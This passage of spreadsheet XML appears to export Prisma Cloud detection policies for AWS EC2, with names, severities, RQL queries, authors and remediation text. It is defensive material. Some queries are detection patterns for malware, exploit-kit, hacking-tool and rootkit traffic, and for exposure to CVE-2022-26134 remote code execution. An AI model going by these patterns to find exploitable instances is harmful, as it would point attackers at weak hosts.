      <c r="AE1679" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1679" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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79" t="inlineStr">
        <is>
          <t>f851344a-d39a-4c9c-9a37-d64f19320043</t>
        </is>
      </c>
      <c r="AI1679" t="inlineStr">
        <is>
          <t>7128cd2e-bb16-4af9-b505-6c473cadbdce</t>
        </is>
      </c>
      <c r="AJ1679" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1679" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1680">
      <c r="A1680" t="inlineStr"/>
      <c r="B1680" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1680" s="2" t="inlineStr"/>
      <c r="D1680" t="inlineStr"/>
      <c r="E1680" t="inlineStr"/>
      <c r="F1680" t="inlineStr"/>
      <c r="G1680" t="b">
        <v>1</v>
      </c>
      <c r="H16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80" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1680" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1680" t="inlineStr">
        <is>
          <t>dmensah-test-demo-2</t>
        </is>
      </c>
      <c r="L1680" t="inlineStr"/>
      <c r="M1680" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1680" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1680" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1680" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1680" t="inlineStr"/>
      <c r="R1680" t="inlineStr"/>
      <c r="S1680" t="inlineStr"/>
      <c r="T1680" t="b">
        <v>0</v>
      </c>
      <c r="U1680" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1680" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1680" t="inlineStr"/>
      <c r="X1680" t="inlineStr"/>
      <c r="Y1680" t="inlineStr"/>
      <c r="Z1680" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = imageId exists</t>
        </is>
      </c>
      <c r="AA1680" t="inlineStr">
        <is>
          <t>Daryl Mensah</t>
        </is>
      </c>
      <c r="AB1680" t="inlineStr">
        <is>
          <t>2024-11-12 11:53:54</t>
        </is>
      </c>
      <c r="AC1680" t="inlineStr"/>
      <c r="AD1680" t="b">
        <v>0</v>
      </c>
      <c r="AE1680" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1680" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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0" t="inlineStr">
        <is>
          <t>fd9410c5-7890-443f-a36e-077171a263c3</t>
        </is>
      </c>
      <c r="AI1680" t="inlineStr">
        <is>
          <t>26475672-4b81-4a6e-aa0b-e166bf7d3289</t>
        </is>
      </c>
      <c r="AJ1680" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1680" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1681">
      <c r="A1681" t="inlineStr"/>
      <c r="B1681" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1681" s="2" t="inlineStr"/>
      <c r="D1681" t="inlineStr"/>
      <c r="E1681" t="inlineStr"/>
      <c r="F1681" t="inlineStr"/>
      <c r="G1681" t="b">
        <v>0</v>
      </c>
      <c r="H16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81" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1681" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1681" t="inlineStr">
        <is>
          <t>AWS EC2 45 Days Old - Owned (v2)</t>
        </is>
      </c>
      <c r="L1681" t="inlineStr"/>
      <c r="M1681" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1681" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1681" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1681" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1681" t="inlineStr"/>
      <c r="R1681" t="inlineStr"/>
      <c r="S1681" t="inlineStr"/>
      <c r="T1681" t="b">
        <v>0</v>
      </c>
      <c r="U1681" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1681" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1681" t="inlineStr"/>
      <c r="X1681" t="inlineStr"/>
      <c r="Y1681" t="inlineStr"/>
      <c r="Z1681" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = '(tags[*].value does not contain prismacloud-scan and tags[*].key does not equal aws:autoscaling:groupName ) and _DateTime.ageInDays(launchTime) &gt; 45 and tags[*].key does not equal owner' addcolumn _DateTime.ageInDays(launchTime)</t>
        </is>
      </c>
      <c r="AA1681" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB1681" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1681" t="inlineStr"/>
      <c r="AD1681" t="b">
        <v>0</v>
      </c>
      <c r="AE1681" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1681" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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81" t="inlineStr">
        <is>
          <t>2d1cc0c0-4a9a-4002-84a8-46365140fc9a</t>
        </is>
      </c>
      <c r="AI1681" t="inlineStr">
        <is>
          <t>9e6fd915-b958-4305-89af-c8213a05c7c6</t>
        </is>
      </c>
      <c r="AJ1681" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1681" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1682">
      <c r="A1682" t="inlineStr"/>
      <c r="B1682" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1682" s="2" t="inlineStr"/>
      <c r="D1682" t="n">
        <v>25</v>
      </c>
      <c r="E1682" t="n">
        <v>27</v>
      </c>
      <c r="F1682" t="n">
        <v>0</v>
      </c>
      <c r="G1682" t="b">
        <v>1</v>
      </c>
      <c r="H16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82" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1682" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1682" t="inlineStr">
        <is>
          <t>Demo 2 : Vulnerable AWS EC2 instance not configured with Metadata Service v2 (IMDSv2) &amp; assigned with public IP &amp; IAM role not enabled</t>
        </is>
      </c>
      <c r="L1682" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1682" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1682" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1682" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1682" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1682" t="inlineStr"/>
      <c r="R1682" t="inlineStr"/>
      <c r="S1682" t="inlineStr"/>
      <c r="T1682" t="b">
        <v>0</v>
      </c>
      <c r="U1682" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1682" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1682" t="inlineStr"/>
      <c r="X1682" t="inlineStr"/>
      <c r="Y1682" t="inlineStr"/>
      <c r="Z1682" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) AND finding.name = (('AWS EC2 instance is assigned with public IP' and 'AWS EC2 Instance IAM Role not enabled' and 'AWS EC2 instance not configured with Instance Metadata Service v2 (IMDSv2)') and ('AWS EC2 instance with network path from the internet (0.0.0.0/0)'))</t>
        </is>
      </c>
      <c r="AA1682" t="inlineStr">
        <is>
          <t>Raj Annaladasu</t>
        </is>
      </c>
      <c r="AB1682" t="inlineStr">
        <is>
          <t>2024-11-04 19:08:29</t>
        </is>
      </c>
      <c r="AC1682" t="inlineStr"/>
      <c r="AD1682" t="b">
        <v>0</v>
      </c>
      <c r="AE1682" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1682" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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2" t="inlineStr">
        <is>
          <t>fe81947a-2d90-4366-b024-b5d6cd263464</t>
        </is>
      </c>
      <c r="AI1682" t="inlineStr">
        <is>
          <t>ee9555b4-87c5-429e-aa13-91b2f2679ebc</t>
        </is>
      </c>
      <c r="AJ1682" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1682" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1683">
      <c r="A1683" t="inlineStr"/>
      <c r="B1683" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1683" s="2" t="inlineStr"/>
      <c r="D1683" t="n">
        <v>4428</v>
      </c>
      <c r="E1683" t="n">
        <v>302</v>
      </c>
      <c r="F1683" t="n">
        <v>2</v>
      </c>
      <c r="G1683" t="b">
        <v>1</v>
      </c>
      <c r="H16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83" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1683" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1683" t="inlineStr">
        <is>
          <t>joy-boyyyyyyy3</t>
        </is>
      </c>
      <c r="L1683" t="inlineStr"/>
      <c r="M1683" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1683" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1683" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1683" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1683" t="inlineStr"/>
      <c r="R1683" t="inlineStr"/>
      <c r="S1683" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="T1683" t="b">
        <v>0</v>
      </c>
      <c r="U1683" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1683" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1683" t="inlineStr"/>
      <c r="X1683" t="inlineStr"/>
      <c r="Y1683" t="inlineStr"/>
      <c r="Z1683" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = tags does not contain "shi-must-audit" or tags does not contain "shi-project-reference"</t>
        </is>
      </c>
      <c r="AA1683" t="inlineStr">
        <is>
          <t>Daryl Mensah</t>
        </is>
      </c>
      <c r="AB1683" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1683" t="inlineStr"/>
      <c r="AD1683" t="b">
        <v>0</v>
      </c>
      <c r="AE1683" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1683" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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3" t="inlineStr">
        <is>
          <t>e851895e-11db-4440-9182-44f35db48d08</t>
        </is>
      </c>
      <c r="AI1683" t="inlineStr">
        <is>
          <t>72ebf59c-7731-4c08-93f1-7f422bf7c179</t>
        </is>
      </c>
      <c r="AJ1683" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1683" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1684">
      <c r="A1684" t="inlineStr"/>
      <c r="B1684" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1684" s="2" t="inlineStr"/>
      <c r="D1684" t="n">
        <v>0</v>
      </c>
      <c r="E1684" t="n">
        <v>0</v>
      </c>
      <c r="F1684" t="n">
        <v>2</v>
      </c>
      <c r="G1684" t="b">
        <v>1</v>
      </c>
      <c r="H16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84" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1684" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1684" t="inlineStr">
        <is>
          <t>migration_test_policy_vstoyko_2</t>
        </is>
      </c>
      <c r="L1684" t="inlineStr"/>
      <c r="M1684" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1684" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1684" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1684" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1684" t="inlineStr"/>
      <c r="R1684" t="inlineStr"/>
      <c r="S1684" t="inlineStr">
        <is>
          <t>new_label</t>
        </is>
      </c>
      <c r="T1684" t="b">
        <v>0</v>
      </c>
      <c r="U1684" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1684" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1684" t="inlineStr">
        <is>
          <t>New Ec2</t>
        </is>
      </c>
      <c r="X1684" t="inlineStr">
        <is>
          <t>test remedy</t>
        </is>
      </c>
      <c r="Y1684" t="inlineStr"/>
      <c r="Z1684" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = launchTime exists</t>
        </is>
      </c>
      <c r="AA1684" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB1684" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1684" t="inlineStr"/>
      <c r="AD1684" t="b">
        <v>0</v>
      </c>
      <c r="AE1684" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1684" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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4" t="inlineStr">
        <is>
          <t>d072ee42-e301-4488-9274-60149360cc26</t>
        </is>
      </c>
      <c r="AI1684" t="inlineStr">
        <is>
          <t>35cede3a-b252-4a8a-8f3d-9ef65b28cb12</t>
        </is>
      </c>
      <c r="AJ1684" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1684" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1685">
      <c r="A1685" t="inlineStr"/>
      <c r="B1685" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1685" s="2" t="inlineStr"/>
      <c r="D1685" t="inlineStr"/>
      <c r="E1685" t="inlineStr"/>
      <c r="F1685" t="inlineStr"/>
      <c r="G1685" t="b">
        <v>0</v>
      </c>
      <c r="H1685" t="inlineStr">
        <is>
          <t>BG-AH-Email-Test, BPtestTag, Default Alert Rule, JEC-Find all Security Groups that opens port 22 to the internet (and are attached to an EC2 instance)., Malware Rule, New Azure Subscription Created, PCS Demo  - Prisma Cloud XSOAR Filter, PCS Demo Compute Alert Test, Ranti-Jira-Alert-rule, anomalies-avega, ar-vstoyko, cj_test_tagBased, jbrox-AlertRule-MSTeams-Email, jbrox-all-accounts-noDDoS-policy, mark davis test 412024, pagerduty-test, splunk-test</t>
        </is>
      </c>
      <c r="I1685" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1685" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1685" t="inlineStr">
        <is>
          <t>EC2 contains malware</t>
        </is>
      </c>
      <c r="L1685" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1685" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1685" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1685" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1685" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1685" t="inlineStr"/>
      <c r="R1685" t="inlineStr"/>
      <c r="S1685" t="inlineStr"/>
      <c r="T1685" t="b">
        <v>0</v>
      </c>
      <c r="U1685" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1685" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1685" t="inlineStr"/>
      <c r="X1685" t="inlineStr">
        <is>
          <t>Remove malware file</t>
        </is>
      </c>
      <c r="Y1685" t="inlineStr"/>
      <c r="Z1685" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) AND finding.name IN ('Host contains Malware')</t>
        </is>
      </c>
      <c r="AA1685" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1685" t="inlineStr">
        <is>
          <t>2024-09-13 16:54:36</t>
        </is>
      </c>
      <c r="AC1685" t="inlineStr"/>
      <c r="AD1685" t="b">
        <v>0</v>
      </c>
      <c r="AE1685" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1685" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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Malware Rule - Notifications:jira,splunk, AccountGroups:Default Account Group,jmontufar.org - 604739746859,mclayton-test,vwg,AWS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85" t="inlineStr">
        <is>
          <t>b40fa19c-db27-4b28-b07c-b98767e178e9</t>
        </is>
      </c>
      <c r="AI1685" t="inlineStr">
        <is>
          <t>48a634a9-8120-42f0-88ba-9ca510f9bad8</t>
        </is>
      </c>
      <c r="AJ1685" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1685" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1686">
      <c r="A1686" t="inlineStr"/>
      <c r="B1686" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1686" s="2" t="inlineStr"/>
      <c r="D1686" t="inlineStr"/>
      <c r="E1686" t="inlineStr"/>
      <c r="F1686" t="inlineStr"/>
      <c r="G1686" t="b">
        <v>1</v>
      </c>
      <c r="H16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86" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1686" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1686" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to publicly exposed admin ports on AWS EC2 instance with risky permissions</t>
        </is>
      </c>
      <c r="L1686" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1686" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1686" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1686" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1686" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1686" t="inlineStr"/>
      <c r="R1686" t="inlineStr"/>
      <c r="S1686" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1686" t="b">
        <v>0</v>
      </c>
      <c r="U1686" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1686" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1686" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with unrestricted access to admin ports (SSH / RDP) and have risky privilege escalation permissions.
Risky permissions on publicly exposed EC2 instances with unrestricted access to admin ports (SSH / RDP) may allow an attacker to gain access to the EC2 instance and leverage access on the instance leading to privilege escalation and unauthorized actions in the cloud account.
This policy checks for the following privilege escalation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risky privilege escalation permissions. Restrict public exposure of admin ports reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X168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686" t="inlineStr"/>
      <c r="Z1686" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0) on Admin ports','AWS EC2 instance with privilege escalation risk permissions')</t>
        </is>
      </c>
      <c r="AA1686" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1686" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:06</t>
        </is>
      </c>
      <c r="AC1686" t="inlineStr"/>
      <c r="AD1686" t="b">
        <v>1</v>
      </c>
      <c r="AE1686" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1686" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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86" t="inlineStr">
        <is>
          <t>1241e782-8c38-45ba-8830-9c8fd5cb9142</t>
        </is>
      </c>
      <c r="AI1686" t="inlineStr">
        <is>
          <t>d0964196-d293-464a-a9e9-762bce021183</t>
        </is>
      </c>
      <c r="AJ1686" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1686" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1687">
      <c r="A1687" t="inlineStr"/>
      <c r="B1687" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1687" s="2" t="inlineStr"/>
      <c r="D1687" t="inlineStr"/>
      <c r="E1687" t="inlineStr"/>
      <c r="F1687" t="inlineStr"/>
      <c r="G1687" t="b">
        <v>1</v>
      </c>
      <c r="H16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87" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1687" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1687" t="inlineStr">
        <is>
          <t>Potentially nefarious hacking tools activity detected on a publicly exposed and vulnerable AWS EC2 instance with risky privilege escalation permissions</t>
        </is>
      </c>
      <c r="L1687" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,MALWARE,INTERNET_EXPOSURE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1687" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1687" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1687" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1687" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1687" t="inlineStr"/>
      <c r="R1687" t="inlineStr"/>
      <c r="S1687" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1687" t="b">
        <v>0</v>
      </c>
      <c r="U1687" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1687" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1687" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with critical or high vulnerabilities and are connected with remote systems known for hacking tool activities having permissions that could potentially lead to privilege escalation.
Publicly exposed and vulnerable AWS EC2 instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. Hacking tools are commonly leveraged by attackers to infect, maintain, administer victim machines, and/or perform denial of service attacks. The risky permissions on the instances that are connected with remote systems known for hacking tool activities further help the attackers to perform unauthorized actions in the cloud account. 
This policy checks for the following risky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investigate hacking tool activities, review risky privilege escalation permissions, remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X168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687" t="inlineStr"/>
      <c r="Z1687" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('AWS EC2 instance with network path from the internet (0.0.0.0/0)' and 'AWS EC2 instance with privilege escalation risk permissions') and ('Traffic to a suspicious IP address associated with Exploit Kit activity' or 'Traffic from a suspicious IP address associated with Exploit Kit activity' or 'Traffic to a suspicious IP address associated with Hacking Tool activity' or 'Traffic from a suspicious IP address associated with Hacking Tool activity' or 'Traffic to a suspicious IP address associated with Rootkit activity' or 'Traffic from a suspicious IP address associated with Rootkit activity')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1687" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1687" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC1687" t="inlineStr"/>
      <c r="AD1687" t="b">
        <v>1</v>
      </c>
      <c r="AE1687" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1687" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG16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87" t="inlineStr">
        <is>
          <t>d62fca2f-6f50-471c-ac13-676bd629556d</t>
        </is>
      </c>
      <c r="AI1687" t="inlineStr">
        <is>
          <t>de819780-4a59-4097-a6e1-d55c2002721a</t>
        </is>
      </c>
      <c r="AJ1687" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1687" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1688">
      <c r="A1688" t="inlineStr"/>
      <c r="B1688" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1688" s="2" t="inlineStr"/>
      <c r="D1688" t="inlineStr"/>
      <c r="E1688" t="inlineStr"/>
      <c r="F1688" t="inlineStr"/>
      <c r="G1688" t="b">
        <v>1</v>
      </c>
      <c r="H16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88" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1688" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1688" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable AWS EC2 instance (Atlassian Confluence Server/Data Center, CVE-2022-26134)</t>
        </is>
      </c>
      <c r="L1688" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1688" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1688" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1688" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1688" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1688" t="inlineStr"/>
      <c r="R1688" t="inlineStr"/>
      <c r="S1688" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1688" t="b">
        <v>0</v>
      </c>
      <c r="U1688" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1688" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1688" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2022-26134).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Atlassian Confluence Server/Data Center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Atlassian Confluence Server/Data Center (CVE-2022-26134) vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X168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CVE-2022-26134
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-26134</t>
        </is>
      </c>
      <c r="Y1688" t="inlineStr"/>
      <c r="Z1688" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-26134'))</t>
        </is>
      </c>
      <c r="AA1688" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1688" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:09</t>
        </is>
      </c>
      <c r="AC1688" t="inlineStr"/>
      <c r="AD1688" t="b">
        <v>1</v>
      </c>
      <c r="AE1688" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1688" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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88" t="inlineStr">
        <is>
          <t>877b935e-a406-4e8f-855e-120fc3daeb21</t>
        </is>
      </c>
      <c r="AI1688" t="inlineStr">
        <is>
          <t>5a70665c-9547-491d-bab7-372b15e6c994</t>
        </is>
      </c>
      <c r="AJ1688" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1688" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1689">
      <c r="A1689" t="inlineStr"/>
      <c r="B1689" s="2" t="inlineStr">
